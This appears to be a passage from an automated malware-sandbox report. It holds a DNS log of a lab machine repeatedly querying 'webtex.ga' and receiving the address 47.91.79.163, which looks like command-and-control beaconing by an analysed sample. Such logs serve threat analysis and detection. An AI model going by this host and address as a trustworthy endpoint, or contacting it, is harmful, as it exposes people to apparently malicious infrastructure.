                                    Dec 3, 2020 10:03:56.065541029 CET192.168.2.38.8.8.80x2127Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:56.584539890 CET192.168.2.38.8.8.80xaf39Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:57.100286007 CET192.168.2.38.8.8.80x9ef3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:57.629905939 CET192.168.2.38.8.8.80x6144Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.233308077 CET192.168.2.38.8.8.80x7360Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.499917984 CET192.168.2.38.8.8.80xc4a6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:58.767443895 CET192.168.2.38.8.8.80x3dd1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.049704075 CET192.168.2.38.8.8.80x5daStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.326589108 CET192.168.2.38.8.8.80x9a3eStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.609312057 CET192.168.2.38.8.8.80x8d7fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:59.880233049 CET192.168.2.38.8.8.80x3864Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.164766073 CET192.168.2.38.8.8.80x3309Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.456994057 CET192.168.2.38.8.8.80xf0dbStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:00.739052057 CET192.168.2.38.8.8.80x4800Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.117043972 CET192.168.2.38.8.8.80x9a8fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.421802998 CET192.168.2.38.8.8.80x674bStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:01.710134983 CET192.168.2.38.8.8.80x6b11Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.015068054 CET192.168.2.38.8.8.80xb6d9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.381865025 CET192.168.2.38.8.8.80xf523Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.661564112 CET192.168.2.38.8.8.80xc521Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:02.942312956 CET192.168.2.38.8.8.80xd047Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.232505083 CET192.168.2.38.8.8.80x7eb0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.505784988 CET192.168.2.38.8.8.80xf399Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:03.795294046 CET192.168.2.38.8.8.80x1a21Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.074474096 CET192.168.2.38.8.8.80xf5b1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.355796099 CET192.168.2.38.8.8.80xf389Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.647460938 CET192.168.2.38.8.8.80xd7e2Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:04.915332079 CET192.168.2.38.8.8.80x9e4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.199299097 CET192.168.2.38.8.8.80xbd95Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.483560085 CET192.168.2.38.8.8.80x5da6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:05.769323111 CET192.168.2.38.8.8.80xcb30Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.074758053 CET192.168.2.38.8.8.80x8b25Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.352900982 CET192.168.2.38.8.8.80x181aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.635427952 CET192.168.2.38.8.8.80x37caStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:06.949789047 CET192.168.2.38.8.8.80x8014Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.224431038 CET192.168.2.38.8.8.80x38f9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.525737047 CET192.168.2.38.8.8.80xd334Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:07.808995962 CET192.168.2.38.8.8.80x7f82Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.217499971 CET192.168.2.38.8.8.80x877Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.498416901 CET192.168.2.38.8.8.80xa0f9Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:08.778889894 CET192.168.2.38.8.8.80x15b0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.057873011 CET192.168.2.38.8.8.80x5fccStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.325339079 CET192.168.2.38.8.8.80x99c0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.614290953 CET192.168.2.38.8.8.80x7e55Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:09.901053905 CET192.168.2.38.8.8.80x99f5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.190378904 CET192.168.2.38.8.8.80xa059Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.459393978 CET192.168.2.38.8.8.80x80e6Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:10.736605883 CET192.168.2.38.8.8.80x29c1Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.023058891 CET192.168.2.38.8.8.80xac48Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.390893936 CET192.168.2.38.8.8.80x9904Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.669486046 CET192.168.2.38.8.8.80x3918Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:11.944083929 CET192.168.2.38.8.8.80xb0f3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.247473955 CET192.168.2.38.8.8.80x18e8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.585220098 CET192.168.2.38.8.8.80x5ef8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:12.864528894 CET192.168.2.38.8.8.80x7295Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.144134045 CET192.168.2.38.8.8.80x938aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.455523968 CET192.168.2.38.8.8.80x33f4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:13.773528099 CET192.168.2.38.8.8.80x2cb5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.070842981 CET192.168.2.38.8.8.80xcfa8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.356909990 CET192.168.2.38.8.8.80x6ed3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.643935919 CET192.168.2.38.8.8.80x311aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:14.910386086 CET192.168.2.38.8.8.80x4c98Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:15.187752008 CET192.168.2.38.8.8.80x82a5Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:15.465322018 CET192.168.2.38.8.8.80x1bb4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:15.742861986 CET192.168.2.38.8.8.80xc751Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.022732019 CET192.168.2.38.8.8.80x693fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.517864943 CET192.168.2.38.8.8.80xaae8Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.820955038 CET192.168.2.38.8.8.80x6eaStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:17.112066031 CET192.168.2.38.8.8.80xdaf3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:17.833745956 CET192.168.2.38.8.8.80x6912Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:18.132854939 CET192.168.2.38.8.8.80xbb4Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:19.915863037 CET192.168.2.38.8.8.80x48f0Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.226304054 CET192.168.2.38.8.8.80x58ebStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.501063108 CET192.168.2.38.8.8.80x58e2Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.803499937 CET192.168.2.38.8.8.80xfb15Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.247961044 CET192.168.2.38.8.8.80xfcddStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.527256012 CET192.168.2.38.8.8.80xe84cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.853420019 CET192.168.2.38.8.8.80xaff7Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.121886015 CET192.168.2.38.8.8.80xbb16Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.394130945 CET192.168.2.38.8.8.80x7419Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.719099998 CET192.168.2.38.8.8.80x1e85Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.981034994 CET192.168.2.38.8.8.80x1d6fStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.254004002 CET192.168.2.38.8.8.80x4e1cStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.541433096 CET192.168.2.38.8.8.80xbd95Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.816549063 CET192.168.2.38.8.8.80x617aStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.106113911 CET192.168.2.38.8.8.80xc7ceStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.394944906 CET192.168.2.38.8.8.80x35d2Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.686381102 CET192.168.2.38.8.8.80x98b3Standard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:25.305768967 CET192.168.2.38.8.8.80xbedcStandard query (0)webtex.gaA (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:25.729907990 CET192.168.2.38.8.8.80x908bStandard query (0)webtex.gaA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Dec 3, 2020 10:02:28.898961067 CET8.8.8.8192.168.2.30x9dc0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:29.270814896 CET8.8.8.8192.168.2.30xcbccNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:29.589957952 CET8.8.8.8192.168.2.30xc90eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:30.129522085 CET8.8.8.8192.168.2.30xf2d3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:30.754401922 CET8.8.8.8192.168.2.30x8338No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.097273111 CET8.8.8.8192.168.2.30x6d5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.500906944 CET8.8.8.8192.168.2.30x9e60No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:31.806010008 CET8.8.8.8192.168.2.30xd5d3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.129793882 CET8.8.8.8192.168.2.30x74e9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.452068090 CET8.8.8.8192.168.2.30x6a4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:32.744071007 CET8.8.8.8192.168.2.30xd74No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.043495893 CET8.8.8.8192.168.2.30x5d50No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.364901066 CET8.8.8.8192.168.2.30x1da8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:33.682089090 CET8.8.8.8192.168.2.30x8589No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.035439014 CET8.8.8.8192.168.2.30x7eabNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.341048002 CET8.8.8.8192.168.2.30xf473No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:34.806020975 CET8.8.8.8192.168.2.30x35eeNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:35.222217083 CET8.8.8.8192.168.2.30xce9dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:36.007853985 CET8.8.8.8192.168.2.30x6755No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:36.291889906 CET8.8.8.8192.168.2.30x9615No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:36.752609968 CET8.8.8.8192.168.2.30xa2f9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:38.533613920 CET8.8.8.8192.168.2.30x88f3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:38.853271961 CET8.8.8.8192.168.2.30x42fbNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.181564093 CET8.8.8.8192.168.2.30xb789No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.515683889 CET8.8.8.8192.168.2.30x5b0fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:39.829411030 CET8.8.8.8192.168.2.30xc726No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.145191908 CET8.8.8.8192.168.2.30xd319No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.442272902 CET8.8.8.8192.168.2.30xc211No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:40.741365910 CET8.8.8.8192.168.2.30xdd07No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.062978029 CET8.8.8.8192.168.2.30x8454No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.397211075 CET8.8.8.8192.168.2.30x1398No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:41.705841064 CET8.8.8.8192.168.2.30x70e5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.011847019 CET8.8.8.8192.168.2.30x7f1fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.305793047 CET8.8.8.8192.168.2.30x3748No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.631668091 CET8.8.8.8192.168.2.30x1726No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:42.955840111 CET8.8.8.8192.168.2.30x602dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.260128975 CET8.8.8.8192.168.2.30x24ebNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.588223934 CET8.8.8.8192.168.2.30x238dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:43.908668041 CET8.8.8.8192.168.2.30x9a51No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.228200912 CET8.8.8.8192.168.2.30xe7c4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.629713058 CET8.8.8.8192.168.2.30x65e4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:44.999114037 CET8.8.8.8192.168.2.30x70f3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.340262890 CET8.8.8.8192.168.2.30xbe0dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.668576002 CET8.8.8.8192.168.2.30x4443No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:45.985465050 CET8.8.8.8192.168.2.30x44adNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.299807072 CET8.8.8.8192.168.2.30x21bdNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.599189997 CET8.8.8.8192.168.2.30x55ddNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:46.919864893 CET8.8.8.8192.168.2.30x5c7cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.186382055 CET8.8.8.8192.168.2.30x2b96No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.486779928 CET8.8.8.8192.168.2.30xf13cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:47.792609930 CET8.8.8.8192.168.2.30xca9dNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.110110044 CET8.8.8.8192.168.2.30xa946No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.409198999 CET8.8.8.8192.168.2.30xbab1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.692008972 CET8.8.8.8192.168.2.30xe678No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:48.980655909 CET8.8.8.8192.168.2.30xe05fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:49.267726898 CET8.8.8.8192.168.2.30x7be3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:49.564949036 CET8.8.8.8192.168.2.30x5ed8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.039614916 CET8.8.8.8192.168.2.30xa25No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.339246988 CET8.8.8.8192.168.2.30x3f42No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.644004107 CET8.8.8.8192.168.2.30x58ceNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:50.950619936 CET8.8.8.8192.168.2.30x2a57No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.238410950 CET8.8.8.8192.168.2.30x9ccaNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.510412931 CET8.8.8.8192.168.2.30x2077No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:51.827558994 CET8.8.8.8192.168.2.30x99f5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.104988098 CET8.8.8.8192.168.2.30x8296No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.420568943 CET8.8.8.8192.168.2.30x8f91No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:52.753354073 CET8.8.8.8192.168.2.30x3392No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.084618092 CET8.8.8.8192.168.2.30xa6edNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.439642906 CET8.8.8.8192.168.2.30x4d4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:53.727933884 CET8.8.8.8192.168.2.30xb873No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.092657089 CET8.8.8.8192.168.2.30xa277No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.383914948 CET8.8.8.8192.168.2.30xd645No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:54.660371065 CET8.8.8.8192.168.2.30x1694No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:55.292409897 CET8.8.8.8192.168.2.30x7c88No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:55.669667006 CET8.8.8.8192.168.2.30xa1c1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:57.143070936 CET8.8.8.8192.168.2.30x8e9cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:57.488672018 CET8.8.8.8192.168.2.30xfea6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:57.888547897 CET8.8.8.8192.168.2.30x3f28No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.201248884 CET8.8.8.8192.168.2.30x1e87No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.506773949 CET8.8.8.8192.168.2.30x7da4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:58.794132948 CET8.8.8.8192.168.2.30x26b0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.090637922 CET8.8.8.8192.168.2.30x41a9No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.359818935 CET8.8.8.8192.168.2.30x1b27No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.656177998 CET8.8.8.8192.168.2.30x9482No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:02:59.950726032 CET8.8.8.8192.168.2.30x4379No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:00.243922949 CET8.8.8.8192.168.2.30x59c6No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:01.549401045 CET8.8.8.8192.168.2.30x15e8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:01.989443064 CET8.8.8.8192.168.2.30x2857No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.292546034 CET8.8.8.8192.168.2.30x34c8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.592231035 CET8.8.8.8192.168.2.30xae95No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:02.866249084 CET8.8.8.8192.168.2.30xcd57No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.134548903 CET8.8.8.8192.168.2.30xc3ffNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.480504990 CET8.8.8.8192.168.2.30x54f1No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:03.831958055 CET8.8.8.8192.168.2.30xb71bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.087317944 CET8.8.8.8192.168.2.30x6edfNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.367944956 CET8.8.8.8192.168.2.30x832aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:04.873424053 CET8.8.8.8192.168.2.30xd28eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:05.167690992 CET8.8.8.8192.168.2.30x355No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:05.561676025 CET8.8.8.8192.168.2.30x2882No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:06.026559114 CET8.8.8.8192.168.2.30x43dfNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:06.298940897 CET8.8.8.8192.168.2.30x803eNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:06.958455086 CET8.8.8.8192.168.2.30x95f7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.223416090 CET8.8.8.8192.168.2.30xba9fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.492100954 CET8.8.8.8192.168.2.30xc3ecNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:07.793365002 CET8.8.8.8192.168.2.30x5723No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.097146988 CET8.8.8.8192.168.2.30x28aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.369294882 CET8.8.8.8192.168.2.30x8aefNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.667260885 CET8.8.8.8192.168.2.30x4a5cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:08.949558973 CET8.8.8.8192.168.2.30xeebaNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.237628937 CET8.8.8.8192.168.2.30x52ffNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.530018091 CET8.8.8.8192.168.2.30x64a0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:09.815169096 CET8.8.8.8192.168.2.30xbdd8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:03:10.270598888 CET8.8.8.8192.168.2.30x220bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
